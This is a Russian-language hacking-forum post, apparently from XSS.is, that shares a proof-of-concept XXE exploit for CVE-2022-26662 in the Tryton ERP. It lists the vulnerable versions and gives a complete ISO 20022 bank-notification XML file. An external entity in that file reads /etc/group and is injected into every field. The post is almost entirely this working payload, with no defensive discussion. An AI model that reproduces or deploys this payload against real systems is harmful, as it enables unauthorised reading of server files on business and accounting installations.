• XSS.stack #1 – первый литературный журнал от юзеров форума

Web CVE-2022-26662 Tryton xxe

0x0021h

RAID-массив
Пользователь
Регистрация
14.11.2021
Сообщения
53
Решения
1
Реакции
78
  • 6.2:<= 6.2.5
  • 6.0:<= 6.0.15
  • 5.0:<= 5.0.45

Poc:
Код:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY payload SYSTEM "file:///etc/group" >]>
<?Standards Smart Test Messages for SEPA Credit Transfer Scheme product version 3.0?>
<?valid true?>
<?description Besides providing an intraday AccountReport at 12.30 PM (see example with BankToCustomerAccountReport), AAAA Banken and Finpetrol have agreed on a credit notification service, for all incoming credits above a certain threshold. On 18 October 2010, at 1.20 PM, AAAASESS sends a BankToCustomerDebitCreditNotification to Company Finpetrol, to advise Finpetrol of an incoming credit on its account.?>
<Document xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:iso:std:iso:20022:tech:xsd:camt.054.001.04" xsi:schemaLocation="urn:iso:std:iso:20022:tech:xsd:camt.054.001.04 file://BE-FILE01/tverschu$/SR%20(Standards%20Release)/SR2013/ISO/Bank-To-Customer%20Cash%20Management/camt.054.001.04.xsd">
    <BkToCstmrDbtCdtNtfctn>
        <GrpHdr>
            <MsgId>&payload;</MsgId>
            <CreDtTm>&payload;</CreDtTm>
        </GrpHdr>
        <Ntfctn>
            <Id>&payload;</Id>
            <CreDtTm>&payload;</CreDtTm>
            <Acct>
                <Id>
                    <Othr>
                        <Id>&payload;</Id>
                    </Othr>
                </Id>
                <Ownr>
                    <Nm>&payload;</Nm>
                </Ownr>
                <Svcr>
                    <FinInstnId>
                        <Nm>&payload;</Nm>
                        <PstlAdr>
                            <Ctry>&payload;</Ctry>
                        </PstlAdr>
                    </FinInstnId>
                </Svcr>
            </Acct>
            <Ntry>
                <Amt Ccy="SEK">&payload;</Amt>
                <CdtDbtInd>&payload;</CdtDbtInd>
                <Sts>&payload;</Sts>
                <BookgDt>
                    <DtTm>&payload;</DtTm>
                </BookgDt>
                <ValDt>
                    <Dt>&payload;</Dt>
                </ValDt>
                <AcctSvcrRef>&payload;</AcctSvcrRef>
                <BkTxCd>
                    <Domn>
                        <Cd>&payload;</Cd>
                        <Fmly>
                            <Cd>&payload;</Cd>
                            <SubFmlyCd>&payload;</SubFmlyCd>
                        </Fmly>
                    </Domn>
                </BkTxCd>
                <NtryDtls>
                    <TxDtls>
                        <Refs>
                            <EndToEndId>&payload;</EndToEndId>
                        </Refs>
                        <Amt Ccy="SEK">&payload;</Amt>
                        <CdtDbtInd>&payload;</CdtDbtInd>
                        <RltdPties>
                            <Dbtr>
                                <Nm>&payload;</Nm>
                            </Dbtr>
                        </RltdPties>
                    </TxDtls>
                </NtryDtls>
            </Ntry>
        </Ntfctn>
    </BkToCstmrDbtCdtNtfctn>
</Document>


Ref:
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх